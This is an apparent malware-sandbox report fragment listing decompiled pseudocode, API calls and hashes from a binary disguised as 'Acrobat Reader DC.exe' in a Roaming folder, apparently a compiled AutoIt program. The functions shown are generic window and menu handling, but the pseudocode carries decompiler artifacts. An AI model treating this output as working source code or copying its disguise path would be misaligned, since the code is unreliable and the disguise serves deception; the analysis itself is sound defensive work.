                                  • Opcode Fuzzy Hash: e2a61d30099513a4b86aa9445ff639564bac9cad2a304c62a227ff9d1443cd16
                                  • Instruction Fuzzy Hash: 05319376600108AFDB11CFA4CD85EEF73B9AF8C701F10419AFA0987250DB75AB85CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00448D62(void* __eflags, signed int _a4, signed char _a7, long _a8) {
                                  				intOrPtr _v8;
                                  				signed int _v12;
                                  				long _t44;
                                  				signed int _t45;
                                  				signed char _t55;
                                  				intOrPtr _t61;
                                  				intOrPtr _t66;
                                  				struct HWND__* _t70;
                                  				struct HWND__** _t75;
                                  
                                  				if(E00441AF5(0x4a8630, _a4,  &_a4,  &_v12) == 0) {
                                  					L27:
                                  					__eflags = 0;
                                  					return 0;
                                  				} else {
                                  					_t61 =  *0x4a8690; // 0x0
                                  					_t66 =  *0x4a86a4; // 0xa51ad0
                                  					_v8 =  *((intOrPtr*)( *((intOrPtr*)(_t61 + _a4 * 4))));
                                  					_t75 =  *( *(_t66 + _v12 * 4));
                                  					_t55 = _t75[0x22];
                                  					_t70 =  *_t75;
                                  					_a7 = _t55;
                                  					E00432B92( &_a8);
                                  					_t44 = _t75[0x11];
                                  					_t83 = _t44;
                                  					if(_t44 >= 0) {
                                  						E004413AA(_t83, _t44);
                                  					}
                                  					_t45 = _t55 & 0x000000ff;
                                  					if(_t45 > 0x1b) {
                                  						goto L27;
                                  					} else {
                                  						switch( *((intOrPtr*)(( *(_t45 + 0x448f86) & 0x000000ff) * 4 +  &M00448F62))) {
                                  							case 0:
                                  								__eax = _a8;
                                  								__eflags = __eax;
                                  								if(__eflags < 0) {
                                  									goto L27;
                                  								} else {
                                  									__esi[0x11] = __eax;
                                  									__eax = E00441432(__ecx, __eflags, __eax, 1);
                                  									goto L23;
                                  								}
                                  								goto L28;
                                  							case 1:
                                  								L19:
                                  								__esi[0x11] = __ebx;
                                  								E00441432(__ecx, __eflags, __ebx, 1) = E00430B87(_v8, __esi, 1);
                                  								goto L23;
                                  							case 2:
                                  								__eax = _a8;
                                  								__eflags = __eax;
                                  								if(__eax < 0) {
                                  									goto L27;
                                  								} else {
                                  									__eax = SendMessageW(__edi, 0x2001, 0, __eax);
                                  									goto L23;
                                  								}
                                  								goto L28;
                                  							case 3:
                                  								__eax = _a8;
                                  								__eflags = __eax;
                                  								if(__eax < 0) {
                                  									goto L27;
                                  								} else {
                                  									__eax = SendMessageW(__edi, 0x111d, 0, __eax);
                                  									goto L23;
                                  								}
                                  								goto L28;
                                  							case 4:
                                  								__eax = _a8;
                                  								__eflags = __eax;
                                  								if(__eflags < 0) {
                                  									goto L27;
                                  								} else {
                                  									__esi[0x11] = __eax;
                                  									__eax = E00441432(__ecx, __eflags, __eax, 1);
                                  									__ecx = __esi[0xc];
                                  									__eax = InvalidateRect(__esi[0xc], 0, 1);
                                  									goto L23;
                                  								}
                                  								goto L28;
                                  							case 5:
                                  								__eax = _a8;
                                  								__eflags = __eax - 0xffffffff;
                                  								if(__eflags < 0) {
                                  									goto L27;
                                  								} else {
                                  									__esi[0x11] = __eax;
                                  									__eax = E00441432(__ecx, __eflags, __eax, 1);
                                  									__eflags = __esi[0x22] & 0x00000020;
                                  									if((__esi[0x22] & 0x00000020) == 0) {
                                  										__eax =  *__esi;
                                  										__edi = ShowWindow;
                                  										__eax = ShowWindow( *__esi, 0);
                                  										__ecx =  *__esi;
                                  										ShowWindow( *__esi, 5) = SetFocus( *__esi);
                                  									}
                                  									goto L23;
                                  								}
                                  								goto L28;
                                  							case 6:
                                  								_t57 = _a8;
                                  								if(_t57 == 0xfffffffe) {
                                  									goto L27;
                                  								} else {
                                  									_t86 = _t57 - 0xfe000000;
                                  									if(_t57 != 0xfe000000) {
                                  										SendMessageW(_t70, 0x1001, 0, _t57);
                                  										SendMessageW(_t70, 0x1026, 0, _t57);
                                  										_t49 = E00430B87(_v8, _t75, 1);
                                  									} else {
                                  										_t75[0x11] = _t57;
                                  										_t49 = E00441432(_t63, _t86, _t57, 1);
                                  									}
                                  									L23:
                                  									if( *0x49751c == 0 || _a7 != 8) {
                                  										return 1;
                                  									} else {
                                  										return _t49 | 0xffffffff;
                                  									}
                                  								}
                                  								goto L28;
                                  							case 7:
                                  								__eflags = __ebx;
                                  								if(__ebx < 0) {
                                  									goto L27;
                                  								} else {
                                  									__eax = GetWindowLongW(__edi, 0xfffffff0);
                                  									__eax = __eax | 0x0000000b;
                                  									__eflags = __eax;
                                  									__eax = SetWindowLongW(__edi, 0xfffffff0, __eax);
                                  									goto L19;
                                  								}
                                  								goto L28;
                                  							case 8:
                                  								goto L27;
                                  						}
                                  					}
                                  				}
                                  				L28:
                                  			}













                                  APIs
                                    • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                                  • SendMessageW.USER32(76F1D360,00001001,00000000,?), ref: 00448E16
                                  • SendMessageW.USER32(76F1D360,00001026,00000000,?), ref: 00448E25
                                    • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                  • String ID:
                                  • API String ID: 3771399671-0
                                  • Opcode ID: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                  • Instruction ID: 7c26134f999fedcb31daf2d1c178305a5bad5d5d588b7e0560cc3c70a69cf84e
                                  • Opcode Fuzzy Hash: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                  • Instruction Fuzzy Hash: C7511570300214ABF720DF24DC85FAE77A9EF14724F10491EFA59AB291CB79E9498B18
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00434621(void* __ecx, int _a4, int _a8, int _a12) {
                                  				long _v8;
                                  				int _t16;
                                  				long _t17;
                                  				long _t19;
                                  				long _t22;
                                  				long _t24;
                                  				long _t32;
                                  				long _t33;
                                  				long _t35;
                                  				struct HWND__* _t38;
                                  				long _t43;
                                  				void* _t55;
                                  
                                  				_t38 = _a8;
                                  				if(_t38 != 0) {
                                  					L2:
                                  					_a8 = 0;
                                  					_v8 = 0;
                                  					_t43 = GetCurrentThreadId();
                                  					if(_a12 == 0) {
                                  						if(_t38 != 0) {
                                  							_t17 =  *0x4a95bc; // 0x0
                                  							AttachThreadInput(_t43, _t17, 0);
                                  							_t33 =  *0x4a95c0; // 0x0
                                  							_t19 =  *0x4a95bc; // 0x0
                                  							if(_t33 != _t19) {
                                  								AttachThreadInput(_t33, _t19, 0);
                                  							}
                                  						}
                                  						_t32 =  *0x4a95c0; // 0x0
                                  						_t16 = AttachThreadInput(_t43, _t32, 0);
                                  						goto L18;
                                  					} else {
                                  						_t22 = GetWindowThreadProcessId(GetForegroundWindow(), 0);
                                  						 *0x4a95c0 = _t22;
                                  						_a12 = AttachThreadInput(_t43, _t22, 1);
                                  						if(_t38 == 0) {
                                  							_t16 = _v8;
                                  						} else {
                                  							_t24 = GetWindowThreadProcessId(_t38,  &_v8);
                                  							_t35 =  *0x4a95c0; // 0x0
                                  							 *0x4a95bc = _t24;
                                  							if(_t35 != _t24) {
                                  								_a8 = AttachThreadInput(_t35, _t24, 1);
                                  								_t24 =  *0x4a95bc; // 0x0
                                  							}
                                  							_t16 = AttachThreadInput(_t43, _t24, 1);
                                  						}
                                  						if(_a12 != 0 || _a8 != 0 || _t16 != 0) {
                                  							L18:
                                  							goto L19;
                                  						} else {
                                  							_t16 =  *0x4a95c0; // 0x0
                                  							if(_t43 != _t16) {
                                  								goto L18;
                                  							} else {
                                  								_t55 = _t16 -  *0x4a95bc; // 0x0
                                  								if(_t55 != 0) {
                                  									goto L18;
                                  								} else {
                                  									 *((intOrPtr*)(_a4 + 0x20)) = 0;
                                  									return _t16;
                                  								}
                                  							}
                                  						}
                                  					}
                                  				} else {
                                  					_t16 = _a4;
                                  					if( *((intOrPtr*)(_t16 + 9)) == 0) {
                                  						L19:
                                  						return _t16;
                                  					} else {
                                  						goto L2;
                                  					}
                                  				}
                                  			}
















                                  APIs
                                  • GetCurrentThreadId.KERNEL32 ref: 00434643
                                  • GetForegroundWindow.USER32(00000000), ref: 00434655
                                  • GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
                                  • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
                                  • GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
                                  • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
                                  • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
                                  • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
                                  • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
                                  • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                  • String ID:
                                  • API String ID: 2156557900-0
                                  • Opcode ID: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                  • Instruction ID: 33c2ceff45d8cb0672f592c0823183733d26e7ad7419b63083ab10cfbc882f35
                                  • Opcode Fuzzy Hash: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                  • Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 83%
                                  			E004542ED(void* _a4, signed int _a8, signed int _a12, intOrPtr _a16, _Unknown_base(*)()* _a20, intOrPtr* _a24, intOrPtr* _a28) {
                                  				signed int _v8;
                                  				void* _v12;
                                  				void* _v16;
                                  				intOrPtr _v20;
                                  				signed int _v24;
                                  				signed int __edi;
                                  				signed int __esi;
                                  				intOrPtr _t118;
                                  				intOrPtr* _t122;
                                  				intOrPtr* _t124;
                                  				intOrPtr* _t128;
                                  				intOrPtr _t134;
                                  				intOrPtr _t135;
                                  				struct HINSTANCE__** _t144;
                                  				void* _t147;
                                  				void* _t151;
                                  				struct HINSTANCE__* _t155;
                                  				intOrPtr* _t158;
                                  				signed int _t159;
                                  				intOrPtr _t160;
                                  				signed int _t168;
                                  				signed int _t173;
                                  				struct HINSTANCE__* _t181;
                                  				signed int _t187;
                                  				signed int _t195;
                                  				signed int _t200;
                                  				signed int _t201;
                                  				intOrPtr* _t202;
                                  				intOrPtr* _t203;
                                  				intOrPtr* _t204;
                                  				void* _t205;
                                  				void* _t206;
                                  				void* _t207;
                                  
                                  				_t158 = _a4;
                                  				_t203 = _a20;
                                  				_t200 = 0;
                                  				 *_a28 = 0;
                                  				 *_a24 = 0;
                                  				E00408F40(0, _t203);
                                  				 *((intOrPtr*)(_t203 + 8)) = 1;
                                  				 *_t203 = 1;
                                  				_t118 =  *((intOrPtr*)(_t158 + 8));
                                  				_a20 = 0;
                                  				_v16 = 0;
                                  				_v20 = _t118;
                                  				if(_t118 <= 0) {
                                  					L13:
                                  					return 6;
                                  				} else {
                                  					while(_a20 == 0) {
                                  						_t188 =  *(_t158 + 4);
                                  						_t144 = ( *(_t158 + 4))[_t200];
                                  						if( *_t144 == 0) {
                                  							L11:
                                  							_t200 = _t200 + 1;
                                  							if(_t200 < _v20) {
                                  								continue;
                                  							} else {
                                  								if(_a20 != 0) {
                                  									break;
                                  								} else {
                                  									goto L13;
                                  								}
                                  							}
                                  						} else {
                                  							_t188 =  *_t144;
                                  							_v8 = 0;
                                  							if( *((intOrPtr*)( *_t144 + 4)) <= 0) {
                                  								goto L11;
                                  							} else {
                                  								_a4 = 0;
                                  								while(1) {
                                  									_t147 = E00422EED(_t200, _t203, _a8,  *((intOrPtr*)( *((intOrPtr*)( *_t144 + 8)) + _a4)));
                                  									_t205 = _t205 + 8;
                                  									if(_t147 == 0) {
                                  										break;
                                  									}
                                  									_t144 = ( *(_t158 + 4))[_t200];
                                  									_t188 =  *_t144;
                                  									_a4 = _a4 + 0xc;
                                  									_t187 = _v8 + 1;
                                  									_v8 = _t187;
                                  									if(_t187 <  *((intOrPtr*)( *_t144 + 4))) {
                                  										continue;
                                  									} else {
                                  										goto L11;
                                  									}
                                  									goto L46;
                                  								}
                                  								_t181 = ( *(( *(_t158 + 4))[_t200]))[2];
                                  								_t195 = _a12;
                                  								_t151 = _v8 + _v8 * 2 + _v8 + _v8 * 2 + _v8 + _v8 * 2 + _v8 + _v8 * 2;
                                  								if(_t195 <  *((intOrPtr*)(_t181 + _t151 + 4)) || _t195 >  *((intOrPtr*)(_t181 + _t151 + 8))) {
                                  									return 7;
                                  								} else {
                                  									_a20 = GetProcAddress( *( *(( *(_t158 + 4))[_t200])),  *(( *(( *(_t158 + 4))[_t200]))[2] + _t151));
                                  									_t155 =  *(_t158 + 4);
                                  									_t188 =  *( *(_t155[_t200]));
                                  									_v16 = GetProcAddress( *( *(_t155[_t200])), "AU3_FreeVar");
                                  									goto L11;
                                  								}
                                  							}
                                  						}
                                  						goto L46;
                                  					}
                                  					_t201 = _a12;
                                  					_t122 = E004135BB(_t188, _t201, _t203, _t201 << 4);
                                  					_t159 = 0;
                                  					_t206 = _t205 + 4;
                                  					_a4 = _t122;
                                  					_a8 = 0;
                                  					if(_t201 > 0) {
                                  						_t202 = _t122;
                                  						do {
                                  							_t134 = _a16;
                                  							_t173 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t134 + 4)) + _t159 * 4)) + 8)) + 0xfffffffe;
                                  							if(_t173 > 5) {
                                  								L25:
                                  								 *_t202 = 1;
                                  								_t135 = E0040C650( *((intOrPtr*)( *((intOrPtr*)(_t134 + 4)) + _t159 * 4)));
                                  								goto L26;
                                  							} else {
                                  								switch( *((intOrPtr*)(_t173 * 4 +  &M00454611))) {
                                  									case 0:
                                  										 *__edi = 2;
                                  										__edx =  *(__eax + 4);
                                  										__eax =  *( *(__eax + 4) + __ebx * 4);
                                  										__eax = E00443006( *( *(__eax + 4) + __ebx * 4));
                                  										 *(__edi + 0xc) = __edx;
                                  										goto L26;
                                  									case 1:
                                  										 *__edi = 3;
                                  										__ecx =  *(__eax + 4);
                                  										__ecx =  *( *(__eax + 4) + __ebx * 4);
                                  										__eax = E0040BAA0(__ecx);
                                  										 *(__edi + 8) = __fp0;
                                  										goto L27;
                                  									case 2:
                                  										 *_t202 = 4;
                                  										_t163 = E0040F6F0(E0045340C( *((intOrPtr*)( *((intOrPtr*)(_t134 + 4)) + _t159 * 4))), _t173 | 0xffffffff, _t203);
                                  										_t141 = E004135BB(_t192, _t202, _t203, E00413530(_t163) + 1);
                                  										_t211 = _t206 + 8;
                                  										 *((intOrPtr*)(_t202 + 8)) = _t141;
                                  										if(_t141 != 0) {
                                  											E00413650(_t141, _t163);
                                  											_t211 = _t211 + 8;
                                  										}
                                  										_push(_t163);
                                  										E004111DC();
                                  										_t159 = _a8;
                                  										_t206 = _t211 + 4;
                                  										goto L27;
                                  									case 3:
                                  										goto L25;
                                  									case 4:
                                  										 *__edi = 5;
                                  										__eax =  *(__eax + __ebx * 4);
                                  										__eax = E0044B3AC(__eax);
                                  										L26:
                                  										 *((intOrPtr*)(_t202 + 8)) = _t135;
                                  										goto L27;
                                  								}
                                  							}
                                  							L27:
                                  							_t159 = _t159 + 1;
                                  							_t202 = _t202 + 0x10;
                                  							_a8 = _t159;
                                  						} while (_t159 < _a12);
                                  						_t201 = _a12;
                                  						_t122 = _a4;
                                  					}
                                  					_v12 = 0;
                                  					_a20(_t201, _t122,  &_v12, _a24, _a28);
                                  					_t124 = _v12;
                                  					_t207 = _t206 + 0x14;
                                  					if(_t124 != 0) {
                                  						_t168 =  *_t124 + 0xfffffffe;
                                  						if(_t168 > 3) {
                                  							_t160 =  *((intOrPtr*)(_t124 + 8));
                                  							E00408F40(_t201, _t203);
                                  							 *((intOrPtr*)(_t203 + 8)) = 1;
                                  							goto L37;
                                  						} else {
                                  							switch( *((intOrPtr*)(_t168 * 4 +  &M00454629))) {
                                  								case 0:
                                  									_t160 =  *((intOrPtr*)(_t124 + 8));
                                  									_v20 =  *((intOrPtr*)(_t124 + 0xc));
                                  									E00408F40(_t201, _t203);
                                  									 *((intOrPtr*)(_t203 + 8)) = 2;
                                  									 *((intOrPtr*)(_t203 + 4)) = _v20;
                                  									goto L37;
                                  								case 1:
                                  									__fp0 =  *(__eax + 8);
                                  									_v24 =  *(__eax + 8);
                                  									__eax = E00408F40(__edi, __esi);
                                  									__fp0 = _v24;
                                  									 *((intOrPtr*)(__esi + 8)) = 3;
                                  									 *__esi = _v24;
                                  									goto L38;
                                  								case 2:
                                  									__edx =  *(__eax + 8);
                                  									__eax = E0043299A( *(__eax + 8), 0xffffffff);
                                  									__ebx = __esi;
                                  									__edi = __eax;
                                  									__eax = E0040E710(__eax, __esi, __ecx);
                                  									_push(__edi);
                                  									__eax = E004111DC();
                                  									__edi = _a12;
                                  									__esp = __esp + 4;
                                  									goto L38;
                                  								case 3:
                                  									__ebx =  *(__eax + 8);
                                  									__eax = E00408F40(__edi, __esi);
                                  									 *((intOrPtr*)(__esi + 8)) = 7;
                                  									L37:
                                  									 *_t203 = _t160;
                                  									goto L38;
                                  							}
                                  						}
                                  						L38:
                                  						if(_t201 > 0) {
                                  							_t204 = _a4;
                                  							do {
                                  								if( *_t204 == 4) {
                                  									E00413748( *((intOrPtr*)(_t204 + 8)));
                                  									_t207 = _t207 + 4;
                                  								}
                                  								_t204 = _t204 + 0x10;
                                  								_t201 = _t201 - 1;
                                  							} while (_t201 != 0);
                                  						}
                                  						E00413748(_a4);
                                  						_t128 = _v16;
                                  						if(_t128 != 0) {
                                  							 *_t128(_v12);
                                  						}
                                  					}
                                  					return 0;
                                  				}
                                  				L46:
                                  			}


                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: AddressProc_free_malloc$_strlen
                                  • String ID: AU3_FreeVar
                                  • API String ID: 3358881862-771828931
                                  • Opcode ID: 9189223602f4225252d80b21b209c7ea8eb6c5ba0733661d26557e2285be57dc
                                  • Instruction ID: 8d08e60933d1045585c44e473594da8d0bbfd8a8652ecee4fcef853dc29158a1
                                  • Opcode Fuzzy Hash: 9189223602f4225252d80b21b209c7ea8eb6c5ba0733661d26557e2285be57dc
                                  • Instruction Fuzzy Hash: 00B1ADB4A00206DFCB00DF55C880A6AB7A5FF88319F2485AEED058F352D739ED95CB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0045FBAC(struct HMENU__** _a4, short _a8, short* _a12, int _a16, int _a20, intOrPtr _a24) {
                                  				struct tagMENUITEMINFOW _v52;
                                  				int _t44;
                                  				int _t50;
                                  				struct HMENU__* _t53;
                                  				int _t54;
                                  				short _t58;
                                  				struct HMENU__* _t64;
                                  				int _t65;
                                  				int _t66;
                                  				struct HMENU__* _t68;
                                  				struct HMENU__** _t70;
                                  				int _t74;
                                  				short* _t76;
                                  				int _t79;
                                  				signed int _t87;
                                  				struct HMENU__** _t93;
                                  
                                  				_t44 = _a16;
                                  				_t70 = _a4;
                                  				if(_t44 == 0xffffffff || _t44 >= 7 && _t44 < 0x207) {
                                  					_t87 = E0044C2C9(_t70);
                                  					if(_t87 == 0xffffffff) {
                                  						goto L29;
                                  					} else {
                                  						_t93 =  *(_t70 + 0x1b4 + _t87 * 4);
                                  						_v52.cbSize = 0x30;
                                  						E00412F40( &(_v52.fMask), 0, 0x2c);
                                  						_t49 = _a16;
                                  						if(_a16 != 0xffffffff) {
                                  							_a16 = 0xffffffff;
                                  							_t50 = E00434179(_t70, _t49,  &_a16);
                                  							__eflags = _t50;
                                  							if(_t50 == 0) {
                                  								L28:
                                  								E0044422D(_t70, _t87);
                                  								goto L29;
                                  							} else {
                                  								_t74 = _a16;
                                  								_v52.fMask = 4;
                                  								_t53 =  *( *(_t70 + 0x1b4 + _t74 * 4));
                                  								 *_t93 = _t53;
                                  								_t54 = GetMenuItemInfoW(_t53, _t74, 0,  &_v52);
                                  								__eflags = _t54;
                                  								if(_t54 == 0) {
                                  									goto L28;
                                  								} else {
                                  									 *_t93 = _v52.hSubMenu;
                                  									__eflags = IsMenu(_v52.hSubMenu);
                                  									if(__eflags == 0) {
                                  										goto L28;
                                  									} else {
                                  										goto L9;
                                  									}
                                  								}
                                  							}
                                  						} else {
                                  							 *_t93 =  *_t70;
                                  							L9:
                                  							_t58 = _a8;
                                  							_t76 = _a12;
                                  							_t93[1] = 0;
                                  							_v52.fMask = 0x32;
                                  							_v52.fType = 0;
                                  							_v52.dwTypeData = _t76;
                                  							_v52.dwItemData = _t87;
                                  							_v52.wID = _t87;
                                  							if(_t58 == 0) {
                                  								__eflags =  *_t76;
                                  								if( *_t76 != 0) {
                                  									__eflags = _a24 - 1;
                                  									if(_a24 == 1) {
                                  										_v52.fType = 0x200;
                                  										_t93[1] = 1;
                                  									}
                                  								} else {
                                  									_v52.fType = 0x800;
                                  								}
                                  								_t93[1] = 0;
                                  								goto L19;
                                  							} else {
                                  								if(_t58 != 1) {
                                  									L19:
                                  									__eflags = _t70[1];
                                  									if(_t70[1] != 0) {
                                  										__eflags = _t70[2];
                                  										if(_t70[2] != 0) {
                                  											__eflags = _t87 - 7;
                                  											if(_t87 >= 7) {
                                  												_t64 =  *_t70;
                                  												__eflags =  *_t93 - _t64;
                                  												if( *_t93 == _t64) {
                                  													_t65 = GetMenuItemCount(_t64);
                                  													_t79 = _a20;
                                  													__eflags = _t79 - 0xffffffff;
                                  													if(_t79 == 0xffffffff) {
                                  														L25:
                                  														_t66 = _t65 + 0xfffffffc;
                                  														__eflags = _t66;
                                  														_a20 = _t66;
                                  													} else {
                                  														_t39 = _t65 - 4; // -4
                                  														__eflags = _t79 + 1 - _t39;
                                  														if(_t79 + 1 > _t39) {
                                  															goto L25;
                                  														}
                                  													}
                                  												}
                                  											}
                                  										}
                                  									}
                                  									__eflags = InsertMenuItemW( *_t93, _a20, 1,  &_v52);
                                  									if(__eflags == 0) {
                                  										goto L12;
                                  									} else {
                                  										_t70[0x275] = _t87;
                                  										return _t87;
                                  									}
                                  								} else {
                                  									_t68 = CreatePopupMenu();
                                  									_t106 = _t68;
                                  									if(_t68 != 0) {
                                  										_v52.fMask = _v52.fMask | 0x00000004;
                                  										_v52.hSubMenu = _t68;
                                  										_t93[1] = 1;
                                  										goto L19;
                                  									} else {
                                  										L12:
                                  										E0045FA41(_t70, _t106, _t87);
                                  										return 0;
                                  									}
                                  								}
                                  							}
                                  						}
                                  					}
                                  				} else {
                                  					L29:
                                  					__eflags = 0;
                                  					return 0;
                                  				}
                                  			}

                                  APIs
                                  • _memset.LIBCMT ref: 0045FBFB
                                  • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FC48
                                  • IsMenu.USER32 ref: 0045FC5F
                                  • CreatePopupMenu.USER32(00000000,?,76F033D0), ref: 0045FC97
                                  • GetMenuItemCount.USER32 ref: 0045FCFD
                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                  • String ID: 0$2
                                  • API String ID: 3311875123-3793063076
                                  • Opcode ID: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                  • Instruction ID: a5f6d3c146e885c54ead74f35c39eec4acd60bc9fc93d28bc39e3d14768ea649
                                  • Opcode Fuzzy Hash: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                  • Instruction Fuzzy Hash: B55192719002099BDB11DF69D888BAF7BB4BB44319F14853EEC15DB282D3B8984CCB66
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 46%
                                  			E00434034(int _a4, char _a8) {
                                  				short _v520;
                                  				short _v1036;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* __ebp;
                                  				void* _t16;
                                  				void* _t21;
                                  				void* _t23;
                                  				void* _t24;
                                  				void* _t26;
                                  
                                  				LoadStringW(GetModuleHandleW(0), _a4,  &_v520, 0x100);
                                  				LoadStringW(GetModuleHandleW(0), 0x1389,  &_v1036, 0x100);
                                  				_t29 = _a8;
                                  				_t23 = _t21;
                                  				_t26 = _t24;
                                  				if(_a8 == 0) {
                                  					return MessageBoxW(0,  &_v1036,  &_v520, 0x11010);
                                  				} else {
                                  					_push(0x484ea8);
                                  					_push(0x484ea8);
                                  					_push( &_v1036);
                                  					_push(0);
                                  					_push( &_v520);
                                  					_push(L"%s (%d) : ==> %s: \n%s \n%s\n");
                                  					return E00413ABE(_t16,  &_v1036, _t23, _t26, _t29);
                                  				}
                                  			}

                                  APIs
                                  • GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe), ref: 00434057
                                  • LoadStringW.USER32(00000000), ref: 00434060
                                  • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
                                  • LoadStringW.USER32(00000000), ref: 00434078
                                  • _wprintf.LIBCMT ref: 004340A1
                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
                                  Strings
                                  • C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe, xrefs: 00434040
                                  • %s (%d) : ==> %s: %s %s, xrefs: 0043409C
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
